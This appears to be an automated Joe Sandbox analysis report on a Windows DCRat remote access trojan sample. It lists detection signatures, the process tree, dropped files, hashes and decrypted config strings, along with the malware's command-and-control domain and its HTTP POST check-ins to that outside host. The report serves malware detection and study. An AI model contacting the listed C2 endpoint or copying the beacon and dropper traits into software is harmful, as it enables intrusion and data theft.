Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
1hibLFnCm1.exe

Overview

General Information

Sample name:1hibLFnCm1.exe
renamed because original name is a hash value
Original sample name:2196EDD4AD9D7E8CA345339A66E2FED5.exe
Analysis ID:1466966
MD5:2196edd4ad9d7e8ca345339a66e2fed5
SHA1:d604a25d04700d19896c1dfe12586568fae5c32f
SHA256:90a9d213bced2844dbf8a635244a85f29fa5af2c439ca7782709b1ebe304734a
Tags:DCRatexe
Infos:

Detection

DCRat
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected DCRat
AI detected suspicious sample
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • 1hibLFnCm1.exe (PID: 6532 cmdline: "C:\Users\user\Desktop\1hibLFnCm1.exe" MD5: 2196EDD4AD9D7E8CA345339A66E2FED5)
    • ms_tool.exe (PID: 6672 cmdline: "C:\Users\user\AppData\Roaming\ms_tool.exe" MD5: F3EDFF85DE5FD002692D54A04BCB1C09)
      • conhost.exe (PID: 6696 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • ms_updater.exe (PID: 6768 cmdline: "C:\Users\user\AppData\Roaming\ms_updater.exe" MD5: CEAC3DE237F6B1DC4B279D8E5F5B3689)
      • cmd.exe (PID: 7096 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\jClCs9nEU3.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 3940 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • chcp.com (PID: 6716 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
        • w32tm.exe (PID: 6600 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
DCRatDCRat is a typical RAT that has been around since at least June 2019.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat

Malware Configuration

No configs have been found

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Roaming\ms_updater.exeJoeSecurity_DCRat_1Yara detected DCRatJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000002.1701362663.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
      00000003.00000000.1699967680.0000000000D92000.00000002.00000001.01000000.00000006.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
        00000003.00000002.1759262008.000000000314B000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
          00000003.00000002.1759262008.0000000002FD1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
            Process Memory Space: 1hibLFnCm1.exe PID: 6532JoeSecurity_DCRat_1Yara detected DCRatJoe Security
              Click to see the 1 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              3.0.ms_updater.exe.d90000.0.unpackJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                0.2.1hibLFnCm1.exe.f50000.0.unpackJoeSecurity_DCRat_1Yara detected DCRatJoe Security

                  Sigma Signatures

                  No Sigma rule has matched

                  Snort Signatures

                  Timestamp:07/03/24-15:52:06.253098
                  SID:2048095
                  Source Port:49730
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Antivirus detection for URL or domain
                  Source: http://118621cm.n9shteam2.top/Avira URL Cloud: Label: malware
                  Source: http://118621cm.n9shteam2.top/protecttrackDatalifePrivateCentral.phpAvira URL Cloud: Label: malware
                  Source: http://118621cm.n9shteam2.topAvira URL Cloud: Label: malware
                  Antivirus detection for dropped file
                  Source: C:\Users\user\AppData\Local\Temp\jClCs9nEU3.batAvira: detection malicious, Label: BAT/Delbat.C
                  Source: C:\Users\user\Desktop\gOvRVAND.logAvira: detection malicious, Label: HEUR/AGEN.1300079
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeAvira: detection malicious, Label: HEUR/AGEN.1309961
                  Multi AV Scanner detection for dropped file
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeReversingLabs: Detection: 87%
                  Multi AV Scanner detection for submitted file
                  Source: 1hibLFnCm1.exeReversingLabs: Detection: 70%
                  AI detected suspicious sample
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                  Machine Learning detection for dropped file
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeJoe Sandbox ML: detected
                  Machine Learning detection for sample
                  Source: 1hibLFnCm1.exeJoe Sandbox ML: detected
                  Sample uses string decryption to hide its real strings
                  Source: 3.0.ms_updater.exe.d90000.0.unpackString decryptor: {"0":[],"75400db8-4680-4af7-97bd-c8a76b65b9c4":{"_0":"AjqVFPjRdUMLGTTtnlMEjUReAbQurGJk","_1":"Application Error","_2":"The application was unable to start correctly (0xc000007b). Click OK to close the application.","_3":"Error","_4":"OK"}}
                  Source: 3.0.ms_updater.exe.d90000.0.unpackString decryptor: ["bj0UKX3O1fsx9BYPGXoKHqjvLayVva1jN63FIaBpzhY4ZE1D43om8NOuAFJtihcbnIkDHSHpW8UjRpWHjvb2vPk9sIFCRRHSF7QQdy5lw8PA2odUtBKwGkpYhlU9MEYF","DCR_MUTEX-Lio0c2TgfpaLmO8sHEt4","0","","","5","2","WyIwIiwiIiwiNSJd","WyIxIiwiV3lJaUxDSXhJaXdpWlhsSmQwbHFiMmxsTVU1YVZURlNSbFJWVWxOVFZscEdabE01Vm1NeVZubGplVGhwVEVOSmVFbHFiMmxhYlVaell6SlZhVXhEU1hsSmFtOXBXbTFHYzJNeVZXbE1RMGw2U1dwdmFWcHRSbk5qTWxWcFRFTkpNRWxxYjJsYWJVWnpZekpWYVV4RFNURkphbTlwV20xR2MyTXlWV2xNUTBreVNXcHZhVnB0Um5Oak1sVnBURU5KTTBscWIybGFiVVp6WXpKVmFVeERTVFJKYW05cFpFaEtNVnBUU1hOSmFtdHBUMmxLYlZsWGVIcGFVMGx6U1dwRmQwbHFiMmxhYlVaell6SlZhVXhEU1hoTlUwazJTVzFhYUdKSVRteEphWGRwVFZSSmFVOXBTakJqYmxac1NXbDNhVTFVVFdsUGFVb3dZMjVXYkVscGQybE5WRkZwVDJsS01HTnVWbXhKYmpBOUlsMD0iXQ=="]
                  Source: 1hibLFnCm1.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: 1hibLFnCm1.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                  Source: Binary string: mountvol.pdb source: 1hibLFnCm1.exe, 1hibLFnCm1.exe, 00000000.00000002.1701362663.0000000000F8D000.00000004.00000001.01000000.00000003.sdmp, ms_tool.exe, 00000001.00000002.1701020136.00007FF68C5E4000.00000002.00000001.01000000.00000005.sdmp, ms_tool.exe, 00000001.00000000.1699378223.00007FF68C5E4000.00000002.00000001.01000000.00000005.sdmp, ms_tool.exe.0.dr
                  Source: Binary string: mountvol.pdbGCTL source: 1hibLFnCm1.exe, 00000000.00000002.1701362663.0000000000F8D000.00000004.00000001.01000000.00000003.sdmp, ms_tool.exe, 00000001.00000002.1701020136.00007FF68C5E4000.00000002.00000001.01000000.00000005.sdmp, ms_tool.exe, 00000001.00000000.1699378223.00007FF68C5E4000.00000002.00000001.01000000.00000005.sdmp, ms_tool.exe.0.dr
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeFile opened: C:\Users\userJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeFile opened: C:\Users\user\AppDataJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeFile opened: C:\Users\user\AppData\LocalJump to behavior

                  Networking

                  barindex
                  Snort IDS alert for network traffic
                  Source: TrafficSnort IDS: 2048095 ET TROJAN [ANY.RUN] DarkCrystal Rat Check-in (POST) 192.168.2.4:49730 -> 104.21.90.190:80
                  Source: Joe Sandbox ViewIP Address: 104.21.90.190 104.21.90.190
                  Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                  Source: global trafficHTTP traffic detected: POST /protecttrackDatalifePrivateCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 118621cm.n9shteam2.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /protecttrackDatalifePrivateCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 118621cm.n9shteam2.topContent-Length: 384Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /protecttrackDatalifePrivateCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 118621cm.n9shteam2.topContent-Length: 1536Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /protecttrackDatalifePrivateCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 118621cm.n9shteam2.topContent-Length: 1056Expect: 100-continueConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /protecttrackDatalifePrivateCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 118621cm.n9shteam2.topContent-Length: 184204Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /protecttrackDatalifePrivateCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 118621cm.n9shteam2.topContent-Length: 1056Expect: 100-continue
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: global trafficDNS traffic detected: DNS query: 118621cm.n9shteam2.top
                  Source: unknownHTTP traffic detected: POST /protecttrackDatalifePrivateCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 118621cm.n9shteam2.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                  Source: ms_updater.exe, 00000003.00000002.1759262008.00000000033A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://118621cm.n9shteX
                  Source: ms_updater.exe, 00000003.00000002.1759262008.00000000030D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://118621cm.n9shteam2.top
                  Source: ms_updater.exe, 00000003.00000002.1759262008.0000000002FD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://118621cm.n9shteam2.top/
                  Source: ms_updater.exe, 00000003.00000002.1759262008.00000000033A6000.00000004.00000800.00020000.00000000.sdmp, ms_updater.exe, 00000003.00000002.1759262008.000000000314B000.00000004.00000800.00020000.00000000.sdmp, ms_updater.exe, 00000003.00000002.1759262008.0000000002FD1000.00000004.00000800.00020000.00000000.sdmp, ms_updater.exe, 00000003.00000002.1759262008.00000000030D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://118621cm.n9shteam2.top/protecttrackDatalifePrivateCentral.php
                  Source: ms_updater.exe, 00000003.00000002.1759262008.0000000002FD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: ms_updater.exe, 00000003.00000002.1769539098.000000001FFA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                  Source: ms_updater.exe, 00000003.00000002.1769539098.000000001FFA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                  Source: ms_updater.exe, 00000003.00000002.1769539098.000000001FFA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                  Source: ms_updater.exe, 00000003.00000002.1769539098.000000001FFA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                  Source: ms_updater.exe, 00000003.00000002.1769539098.000000001FFA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                  Source: ms_updater.exe, 00000003.00000002.1769539098.000000001FFA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                  Source: ms_updater.exe, 00000003.00000002.1769539098.000000001FFA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                  Source: ms_updater.exe, 00000003.00000002.1769539098.000000001FFA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                  Source: ms_updater.exe, 00000003.00000002.1769539098.000000001FFA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                  Source: ms_updater.exe, 00000003.00000002.1769539098.000000001FFA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                  Source: ms_updater.exe, 00000003.00000002.1769539098.000000001FFA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                  Source: ms_updater.exe, 00000003.00000002.1769539098.000000001FFA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                  Source: ms_updater.exe, 00000003.00000002.1769539098.000000001FFA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                  Source: ms_updater.exe, 00000003.00000002.1769539098.000000001FFA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                  Source: ms_updater.exe, 00000003.00000002.1769539098.000000001FFA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                  Source: ms_updater.exe, 00000003.00000002.1769539098.000000001FFA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                  Source: ms_updater.exe, 00000003.00000002.1769539098.000000001FFA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                  Source: ms_updater.exe, 00000003.00000002.1769539098.000000001FFA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                  Source: ms_updater.exe, 00000003.00000002.1769539098.000000001FFA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                  Source: ms_updater.exe, 00000003.00000002.1769539098.000000001FFA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                  Source: ms_updater.exe, 00000003.00000002.1769539098.000000001FFA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                  Source: ms_updater.exe, 00000003.00000002.1769539098.000000001FFA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                  Source: ms_updater.exe, 00000003.00000002.1769539098.000000001FFA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                  Source: ms_updater.exe, 00000003.00000002.1769539098.000000001FFA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                  Source: ms_updater.exe, 00000003.00000002.1769539098.000000001FFA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_tool.exeCode function: 1_2_00007FF68C5E1494 LocalAlloc,NtQuerySystemInformation,LocalFree,LocalAlloc,LocalFree,1_2_00007FF68C5E1494
                  Source: C:\Users\user\AppData\Roaming\ms_tool.exeCode function: 1_2_00007FF68C5E1348 NtQuerySystemInformation,1_2_00007FF68C5E1348
                  Source: C:\Users\user\AppData\Roaming\ms_tool.exeCode function: 1_2_00007FF68C5E13B4: CreateFileW,DeviceIoControl,CloseHandle,1_2_00007FF68C5E13B4
                  Source: C:\Users\user\Desktop\1hibLFnCm1.exeCode function: 0_2_00F538600_2_00F53860
                  Source: C:\Users\user\Desktop\1hibLFnCm1.exeCode function: 0_2_00F6D2BB0_2_00F6D2BB
                  Source: C:\Users\user\Desktop\1hibLFnCm1.exeCode function: 0_2_00F6DAB90_2_00F6DAB9
                  Source: C:\Users\user\Desktop\1hibLFnCm1.exeCode function: 0_2_00F7420D0_2_00F7420D
                  Source: C:\Users\user\Desktop\1hibLFnCm1.exeCode function: 0_2_00F63B400_2_00F63B40
                  Source: C:\Users\user\Desktop\1hibLFnCm1.exeCode function: 0_2_00F696DB0_2_00F696DB
                  Source: C:\Users\user\Desktop\1hibLFnCm1.exeCode function: 0_2_00F60E130_2_00F60E13
                  Source: C:\Users\user\AppData\Roaming\ms_tool.exeCode function: 1_2_00007FF68C5E17541_2_00007FF68C5E1754
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeCode function: 3_2_00007FFD9BAAC4253_2_00007FFD9BAAC425
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeCode function: 3_2_00007FFD9BAAC3503_2_00007FFD9BAAC350
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeCode function: 3_2_00007FFD9BAA12223_2_00007FFD9BAA1222
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeCode function: 3_2_00007FFD9BAA80283_2_00007FFD9BAA8028
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeCode function: 3_2_00007FFD9BAA8E703_2_00007FFD9BAA8E70
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeCode function: 3_2_00007FFD9BAB48EE3_2_00007FFD9BAB48EE
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeCode function: 3_2_00007FFD9BAA8E7F3_2_00007FFD9BAA8E7F
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeCode function: 3_2_00007FFD9BBEAC2A3_2_00007FFD9BBEAC2A
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeCode function: 3_2_00007FFD9BBE80223_2_00007FFD9BBE8022
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeCode function: 3_2_00007FFD9BBE8B213_2_00007FFD9BBE8B21
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeCode function: 3_2_00007FFD9BBE1B103_2_00007FFD9BBE1B10
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeCode function: 3_2_00007FFD9BBE72763_2_00007FFD9BBE7276
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeCode function: 3_2_00007FFD9BBF364E3_2_00007FFD9BBF364E
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeCode function: 3_2_00007FFD9BBE4A0D3_2_00007FFD9BBE4A0D
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeCode function: 3_2_00007FFD9BBE21B53_2_00007FFD9BBE21B5
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeCode function: 3_2_00007FFD9BBE49CD3_2_00007FFD9BBE49CD
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeCode function: 3_2_00007FFD9BBF813D3_2_00007FFD9BBF813D
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeCode function: 3_2_00007FFD9BBE8B7D3_2_00007FFD9BBE8B7D
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeCode function: 3_2_00007FFD9BBE1AF53_2_00007FFD9BBE1AF5
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeCode function: 3_2_00007FFD9BBE49A83_2_00007FFD9BBE49A8
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeCode function: 3_2_00007FFD9BBF7DB93_2_00007FFD9BBF7DB9
                  Source: Joe Sandbox ViewDropped File: C:\Users\user\Desktop\gOvRVAND.log AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                  Source: C:\Users\user\Desktop\1hibLFnCm1.exeCode function: String function: 00F5BBC0 appears 55 times
                  Source: gOvRVAND.log.3.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                  Source: mHYqxgSr.log.3.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                  Source: 1hibLFnCm1.exeBinary or memory string: OriginalFilename vs 1hibLFnCm1.exe
                  Source: 1hibLFnCm1.exe, 00000000.00000002.1701362663.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs 1hibLFnCm1.exe
                  Source: 1hibLFnCm1.exe, 00000000.00000002.1701362663.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameMOUNTVOL.EXEj% vs 1hibLFnCm1.exe
                  Source: 1hibLFnCm1.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: 1hibLFnCm1.exeStatic PE information: Section: .cSs ZLIB complexity 0.9997302899534523
                  Source: gOvRVAND.log.3.dr, -.csCryptographic APIs: 'TransformFinalBlock'
                  Source: mHYqxgSr.log.3.dr, -.csCryptographic APIs: 'TransformFinalBlock'
                  Source: classification engineClassification label: mal100.troj.evad.winEXE@13/8@1/1
                  Source: C:\Users\user\Desktop\1hibLFnCm1.exeFile created: C:\Users\user\AppData\Roaming\ms_tool.exeJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeMutant created: NULL
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6696:120:WilError_03
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeMutant created: \Sessions\1\BaseNamedObjects\Local\DCR_MUTEX-Lio0c2TgfpaLmO8sHEt4
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3940:120:WilError_03
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeFile created: C:\Users\user\AppData\Local\Temp\LLzNk9wqw6Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\jClCs9nEU3.bat"
                  Source: 1hibLFnCm1.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Users\user\Desktop\1hibLFnCm1.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                  Source: C:\Users\user\Desktop\1hibLFnCm1.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: 1hibLFnCm1.exeReversingLabs: Detection: 70%
                  Source: unknownProcess created: C:\Users\user\Desktop\1hibLFnCm1.exe "C:\Users\user\Desktop\1hibLFnCm1.exe"
                  Source: C:\Users\user\Desktop\1hibLFnCm1.exeProcess created: C:\Users\user\AppData\Roaming\ms_tool.exe "C:\Users\user\AppData\Roaming\ms_tool.exe"
                  Source: C:\Users\user\AppData\Roaming\ms_tool.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\1hibLFnCm1.exeProcess created: C:\Users\user\AppData\Roaming\ms_updater.exe "C:\Users\user\AppData\Roaming\ms_updater.exe"
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\jClCs9nEU3.bat"
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                  Source: C:\Users\user\Desktop\1hibLFnCm1.exeProcess created: C:\Users\user\AppData\Roaming\ms_tool.exe "C:\Users\user\AppData\Roaming\ms_tool.exe" Jump to behavior
                  Source: C:\Users\user\Desktop\1hibLFnCm1.exeProcess created: C:\Users\user\AppData\Roaming\ms_updater.exe "C:\Users\user\AppData\Roaming\ms_updater.exe" Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\jClCs9nEU3.bat" Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2Jump to behavior
                  Source: C:\Users\user\Desktop\1hibLFnCm1.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\1hibLFnCm1.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\1hibLFnCm1.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\1hibLFnCm1.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\1hibLFnCm1.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\1hibLFnCm1.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\Desktop\1hibLFnCm1.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1hibLFnCm1.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Users\user\Desktop\1hibLFnCm1.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\Desktop\1hibLFnCm1.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\Desktop\1hibLFnCm1.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\Desktop\1hibLFnCm1.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\1hibLFnCm1.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Users\user\Desktop\1hibLFnCm1.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\1hibLFnCm1.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\1hibLFnCm1.exeSection loaded: appresolver.dllJump to behavior
